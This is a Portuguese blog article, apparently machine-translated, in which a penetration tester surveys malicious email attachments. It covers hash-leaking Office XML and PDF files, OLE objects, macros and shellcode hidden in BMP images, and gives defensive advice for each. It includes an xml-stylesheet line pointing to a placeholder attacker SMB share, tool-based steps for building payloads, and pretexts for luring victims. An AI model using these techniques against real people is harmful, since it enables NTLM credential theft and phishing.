Meu trabalho está relacionado ao fato de eu mentir para as pessoas e explorar sua credulidade, curiosidade, ganância e assim por diante. Adoro o meu trabalho e tento abordá-lo de forma criativa. As especificidades da minha atividade estão relacionadas à condução de ataques pelo método da engenharia social. E neste post, eu gostaria de falar sobre anexos maliciosos.
Se o PDF cair no seu e-mail, você o abrirá? E o arquivo do Word? Você abrirá a imagem de uma fonte desconhecida? É possível ter problemas se você baixar o arquivo? Como você sabe quais investimentos são perigosos e quais não são? E os seus colegas?
Para várias dezenas de projetos, tentei maneiras completamente diferentes de entregar a carga útil ao usuário. Alguns foram muito eficazes, outros foram facilmente detectados - cada um tem suas próprias desvantagens e vantagens. Não começarei a dizer como compactar arquivos executáveis com a extensão .exe no arquivo morto. Com essa abordagem antiquada, é mais dispendioso romper os sistemas de segurança e também fazer com que o usuário inicie o anexo. Vou lhe dizer quais arquivos potencialmente perigosos podem realmente ser recebidos por correio (ou enviados) hoje.
Isenção de responsabilidade: Todos os itens a seguir são apenas para fins informativos. O autor descreve a experiência adquirida durante o teste, não é responsável pela repetição desses ataques e incentiva a não usar o material para fins ilegais.
XML
A essência do métodoA maioria dos arquivos do Office é baseada no Microsoft Office Open XML (OOXML), que é essencialmente um formato XML compactado desenvolvido pela Microsoft para apresentar tabelas, diagramas, apresentações e assim por diante. O envolvimento do XML é exibido na extensão do documento (docx, xlsx, pptx). É muito curioso que esses documentos do Office possam ser abertos como um arquivo de texto comum com todas as tags e atributos. Qualquer arquivo XML aberto do Office pode ser salvo como XML e fazer alterações nas tags. Por exemplo, adicione um link a uma pasta pública controlada por um invasor. Quando você executa o arquivo XML, ele tenta se conectar a uma pasta pública aberta. Ao tentar se conectar via protocolo smb, o Windows fornece um hash NTLM (NTLMv2) e login de usuário para um invasor.
Implementação em poucas palavrasPara implementar o vetor, você precisa criar um documento XML aberto do Office (docx, pptx, xlsx etc.) e salve-o como XML. Abra o XML e faça as seguintes alterações:
<?xml-stylesheet type="text/xsl" href="\\xxx.xxx.xxx.xxx \test\swordfish.xsl ">Na tag especificada, você deve especificar o endereço da pasta da rede pública à qual a vítima se conectará.
Nota : em vez de
="\\xxx.xxx.xxx.xxx\test\swordfish.xsl você pode gravar o
file:/// xxx.xxx.xxx.xxx/test/swordfish.xsl . Em seguida, o arquivo deve ser salvo e enviado à vítima.
Informações sobre o ataque podem ser encontradas
aqui .
Nota : dependendo do sistema operacional e das configurações, o usuário pode ter que concordar com condições ou comentários adicionais, por exemplo:
Um artigo ficaria incompleto sem conselhos de proteção:
- Use uma política de senha complexa.
- Use NTLMv2.
- Negar tráfego externo via smb (tcp 139/445).
Bad-pdf
A essência do métodoUma tag é adicionada ao arquivo PDF com um link para um servidor SMB público controlado pelo invasor. Como no exemplo acima, ao abrir um arquivo, o sistema operacional transmite um hash NTLM (NTLMv2) para conectar-se à pasta pública.
Implementação em poucas palavrasImplementar esse ataque é muito mais fácil que o anterior. Para roubar um hash com sucesso, basta baixar o utilitário (git clone
aqui ou
aqui ) e conceder o direito de executar (chmod + x) o arquivo python. Em seguida, execute o script python e insira o endereço IP, o nome do arquivo e a interface, como na figura abaixo.
Gerando um arquivo de carga útil.O arquivo recebido pode ser enviado para o correio sob o pretexto de um parabéns, um documento para assinatura, uma verificação do aplicativo e assim por diante. Quando o arquivo iniciar, todos os hashes serão enviados ao invasor.
Protecção- Use uma política de senha complexa.
- Use NTLMv2.
- Negar tráfego externo via smb (tcp 139/445).
Objeto OLE
A essência do métodoEm um documento legítimo do Office, um script iniciado ao clicar é incorporado. O script pode ser absolutamente qualquer, geralmente é apenas uma carga útil. Ele tem seu próprio ícone, que pode ser alterado, dependendo dos desejos do invasor, até uma cópia completa do estilo dos documentos do Office que simulam mensagens de erro. Diferentemente das macros, um arquivo com um anexo OLE não é suspeito para usuários comuns.
Implementação em poucas palavrasPara se preparar para este ataque, será necessário um pouco mais de esforço (em comparação com os acima). O primeiro passo é gerar uma carga útil. Em seguida, você precisa iniciar o servidor, que receberá as conexões da carga útil, criar um documento do Word, convertê-lo em RTF e adicionar um link à carga útil. Se brevemente.
Informações sobre o ataque podem ser encontradas
aqui .
ProtecçãoPara se proteger contra esses ataques,
recomendamos que
você faça as seguintes alterações no registro:
HKCUSoftwareMicrosoftOffice -> Office Version -> Office application -> SecurityPackagerPromptO valor da
Office Version pode ser 16.0 (Office 2016); 15.0 (Office 2013); 14.0 (Office 2010); ou 12.0 (Office 2007). O valor do
Office application do
Office application é o nome de um aplicativo específico do Office, ou seja, Word, Excel e assim por diante.
O valor dessa chave do registro deve ser "2", o que significa "Nenhum prompt, o objeto não é executado" ou uma proibição real da execução de objetos. Um valor "1" permite ao usuário "Avisar do Office quando o usuário clica, o objeto é executado", ou seja, os objetos são clicados e o Office exibe a mensagem correspondente. O valor "0", por sua vez, significa "Nenhum prompt do Office quando o usuário clica, o objeto é executado", ou seja, os objetos são executados, mas o usuário não recebe nenhuma mensagem do Office.
Podem ser feitas alterações se essas funções não forem usadas nos processos de negócios da sua empresa.
Macros
Desde que o OLE foi mencionado, como não posso mencionar macros?
A essência do métodoMacro - um conjunto de comandos projetado para simplificar o trabalho do usuário. Potencialmente, você pode escrever absolutamente qualquer conjunto de comandos em uma macro e, assim, obter uma carga útil. Para criar um documento com uma macro, o invasor só precisa ofuscar o código da carga útil e adicionar o código à macro do documento.
Implementação em poucas palavrasExistem muitas maneiras de gerar uma macro no momento. Você pode usar a ferramenta
Luckystrike ou parar no
Metasploit mais familiar. Você pode usar o msfvenom e ofuscar a macro após a geração. Quando a macro é criada, tudo o que você precisa fazer é adicioná-la ao documento do Office. Mas, diferentemente de um anexo OLE, você realmente precisa de muito esforço para executar uma macro. No momento, muito poucos usuários executam macros. O Windows já aprendeu a alertar sobre macros suspeitas e tem havido muita conversa sobre seu perigo.
ProtecçãoPara garantir a confiabilidade, recomendo desativar a execução da macro sem notificação.
BMP
É muito improvável que você encontre um anexo BMP com um código de shell, portanto, esteja ciente: existem.
A essência do métodoO código do shell está incorporado na imagem no formato BMP. A imagem em si não é perigosa no momento da descoberta. Não se trata de permitir que um invasor faça uma sessão. A imagem é necessária para mentir e aguardar a hora em que o atacante a ativa usando o comando Powershell. Esse método não é tanto um ataque como um desvio de antivírus e ferramentas de detecção de intrusão.
Implementação em poucas palavrasPara criar uma imagem, basta usar este
repositório . O DKMC fornece tudo, desde a geração de imagens até a ofuscação do código. Também quero observar que a imagem "infectada" conterá pixels multicoloridos estranhos. Isso pode ser facilmente corrigido se você cortar a área visível da imagem em 5 a 10 pixels.
Após criar a imagem, o arquivo deve ser entregue à vítima e aguardar a ocasião certa ou procurar a oportunidade de executar o script do PowerShell.
ProtecçãoFiltrar todos os arquivos bmp como potencialmente perigosos é ineficiente. Você pode usar conversores e salvar imagens em outros formatos, inspecionar arquivos em computadores ou aceitar o fato de que, se um invasor conseguir usar o script do PowerShell no computador de um funcionário, a presença de uma imagem com código de shell não será o principal problema de segurança.
Isso, de fato, é tudo. Espero que este artigo tenha expandido sua compreensão dos investimentos e dos perigos que eles podem trazer. Falaremos sobre links suspeitos um pouco mais tarde.
Ekaterina Rudaya ( Caterin ), especialista no Laboratório de Análise Prática de Segurança, Jet Infosystems